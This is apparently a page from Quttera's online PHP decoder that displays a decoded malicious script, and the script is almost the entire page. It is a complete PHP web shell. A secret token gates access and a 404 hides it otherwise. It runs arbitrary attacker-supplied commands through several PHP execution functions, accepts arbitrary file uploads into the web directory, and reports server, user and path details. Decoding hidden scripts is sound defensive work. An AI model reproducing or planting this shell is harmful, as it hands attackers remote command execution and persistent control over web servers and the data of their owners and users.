Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


=error_reporting(0);
@ini_set('display_errors',0);
	if(!isset($_GET['t'])||$_GET['t']!=='i5jkfqlvfayzlh4b'){
	http_response_code(404);
	die();
}
$c=isset($_GET['c'])?$_GET['c']:(isset($_POST['c'])?$_POST['c']:'');
	if($c==='__v'){
	echo 'RXST:'.base64_encode('MATHOK:181305').':RXEND';
	die();
}
	if($c!==''){
	$cmd=@hex2bin($c);
	if($cmd===false)$cmd=$c;
	$cmd.=' 2>&1';
	$o='';
		if(function_exists('shell_exec')){
		$o=@shell_exec($cmd);
	}
		elseif(function_exists('exec')){
		@exec($cmd,$arr);
		$o=implode("\n",$arr);
	}
		elseif(function_exists('system')){
		ob_start();
		@system($cmd);
		$o=ob_get_clean();
	}
		elseif(function_exists('passthru')){
		ob_start();
		@passthru($cmd);
		$o=ob_get_clean();
	}
		elseif(function_exists('popen')){
		$h=@popen($cmd,'r');
		$o='';
			while(!feof($h)){
			$o.=fread($h,4096);
		}
		pclose($h);
	}
		elseif(function_exists('proc_open')){
		$d=[['pipe','r'],['pipe','w'],['pipe','w']];
		$p=@proc_open($cmd,$d,$pi);
			if($p){
			$o=stream_get_contents($pi[1]);
			proc_close($p);
		}
	}
		else{
		$o='NOFUNC';
	}
	echo 'RXST:'.base64_encode($o===null?'':$o).':RXEND';
	die();
}
	if(isset($_FILES['f'])){
	$n=basename($_FILES['f']['name']);
		if(move_uploaded_file($_FILES['f']['tmp_name'],getcwd().'/'.$n)){
		echo 'RXST:'.base64_encode('UP:'.$n).':RXEND';
	}
		else{
		echo 'RXST:'.base64_encode('FAIL').':RXEND';
	}
	die();
}
echo '<pre>';
echo 'SRV: '.php_uname().'\n';
echo 'PHP: '.phpversion().'\n';
echo 'USR: '.get_current_user().'\n';
echo 'PWD: '.getcwd().'\n';
echo 'DOC: '.$_SERVER['DOCUMENT_ROOT'].'\n';
echo 'SFT: '.$_SERVER['SERVER_SOFTWARE'].'\n';
echo '</pre>';
echo '<form method=post enctype=multipart/form-data>';
echo '<input type=file name=f><input type=submit value=Up>';
echo '</form>';



© 2023 Quttera Ltd. All rights reserved.